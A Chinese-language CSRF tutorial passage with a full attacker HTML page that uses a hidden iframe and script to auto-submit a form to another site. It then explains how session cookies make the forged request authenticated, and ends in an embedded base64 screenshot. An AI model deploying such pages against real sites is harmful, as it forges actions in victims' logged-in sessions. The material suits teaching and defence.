1、攻击者在“页面1”中http://www.b.com/indexb.html中写下如下代码:

 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

 <html>

     <head>

         <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />

         <title>Welcome to CSRF</title>

     </head>

     <p style="color:blue; text-align:center; font-size:60px;">Your're by CSRF</p>

     <body>

     <!--hidden属性使内联框架iframe隐藏,这样的CSRF隐蔽-->

         <iframe  hidden  width=1000 heigth=100 src="#" srcdoc='

             <form action="http://www.a.com/indexa.html" id="register" method="get" name="form">

                 <input type=text name="username" value=""  />

                 <input type=password name="password" value="" />

             </form>

             <script>

                 var f = document.getElementById("register");

                 console.log(f.username.value);

                 f.username.value="test";

                 f.password.value="passwd";

                 //进行自动提交

                 document.form.submit();

             </script>

         '></iframe>

     </body>

 </html>

2、当访问”页面1“时,这段代码向http://www.a.com/indexa.html发送了一个GET请求(当然POST也可以),而且是当用户访问的时候自动提交的。由于内嵌在iframe中且iframe设置了hidden属性,所以你看不到浏览器界面有什么变化(url没有变化,也看不到iframe)。假如用户在访问”页面1“之前已经访问过了网站”http://www.a.com/indexa.html“同域下的其他认证页面,这时,只要浏览器没有关闭或者重启的化(关闭认证的tab页没有影响),则临时cookie(一般认证通过设置cookie的方式实现)即session cookie会存在于内存中;在内存中的session cookie未消失之前,访问同域下的其他页面,浏览器就会在这些页面的header中带上cookie值。通过上面这样的方式便实现了授权的CSRF。

3、临时cookie存在于内存中,浏览器关闭或者重启,释放内存,才会清空临时cookie;本地cookie存在于硬盘上,只要到期后才会消失

4、IE浏览器目前不支持iframe的srcdoc属性,因此IE不适用本文,其他主流浏览器可以,如下所示:

aaarticlea/png;base64,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